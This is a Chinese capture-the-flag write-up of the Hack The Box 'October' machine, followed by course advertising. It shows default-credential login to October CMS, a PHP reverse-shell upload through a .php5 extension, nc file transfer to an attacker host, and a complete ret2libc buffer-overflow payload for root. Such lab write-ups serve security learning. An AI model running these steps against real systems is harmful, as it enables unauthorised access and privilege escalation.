Hack The Box 之 October靶机

October介绍

image

nmap 扫描

image发现开放80和22端口,发现网站的框架为October
CMS.

反弹shell

作为PHP开源CMS平台,october是一个免费,开源,自托管的CMS平台,基于Laravel PHP框架开发。它构建现代网站的一种高效工具 ,基于灵活的模式。特性:1、页面组件 2、可扩展的平台 3、简单的 AJAX 框架 4、易管理的界面 5、完全基于文件的CMS模板

其默认的登录页面为backend目录,或者可以直接用dirbuster扫描出后台登录url,直接用admin/admin弱密码登录,成功登录。

image

尝试上传后缀名为php的文件,失败,然后看见目录下全部都是后缀名为php5,然后上传后缀名为php5的文件,成功。
可以直接上传反弹[php马](https://pentestmonkey.net/tools/web-shells/php-reverse-
shell),修改下端口和地址。

image

成功反弹shell
image

python -c 'import pty; pty.spawn("/bin/bash")' ##转化为标准的交互模式

提权

SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

find -perm -4000 2>/dev/null ##搜索尝试查找具有root权限的SUID的文件
image

用nc 传到本地来进行调试。

nc -w 5 10.10.14.3 8003 < ovrflw
nc -l -p 8003 > ovrflw

用IDA打开,F5反汇编,发现存在strncpy的缓冲区溢出。
image用gdb+peda调试栈溢出的偏移,可以直接用peda中pattern生成填充的字符串来打印出偏移的大小。
image

ldd /usr/local/bin/ovrflw ##发现libc的地址以及位置
image

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
imageimage

libcstart = 0xb755b000
libcsystem_off = 0x00040310
libcexit_off = 0x00033260
system = libcstart + libcsystem_off=0xb759b310
exit = libcstart + libcexit_off=0xb758e260
sh_offset = 0x162bac
sh = libcstart + sh_offset=0xb76bdbac

payload: 偏移+system+exit+sh

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xb3\x59\xb7\x60\xe2\x58\xb7\xac\xdb\x6b\xb7"'); done
image

其中刚刚开始是以内核版本为突破口,检查发现靶机内核版本过低,有相关的CVE可以提权。
image
谷歌搜索发现CVE-2017-16995符合要求
image但是nc反弹的shell权限过低,无法完成CVE提权。
image

总结

October靶机在hack the box中属于难度中等的靶机,其渗透过程涉及的知识点属于比较常见的类型,但是在最后一步提权的步骤中,涉及到CTF中pwn的栈溢出知识点,相较于之前的提权方法来说,可以说新颖很多,没有依赖现成的工具,对于之后的安全学习之路上,需要兼顾二进制和web,争取做一个全栈的小白。

n的栈溢出知识点,相较于之前的提权方法来说,可以说新颖很多,没有依赖现成的工具,对于之后的安全学习之路上,需要兼顾二进制和web,争取做一个全栈的小白。

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tsqnyp3K-1692062759904)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值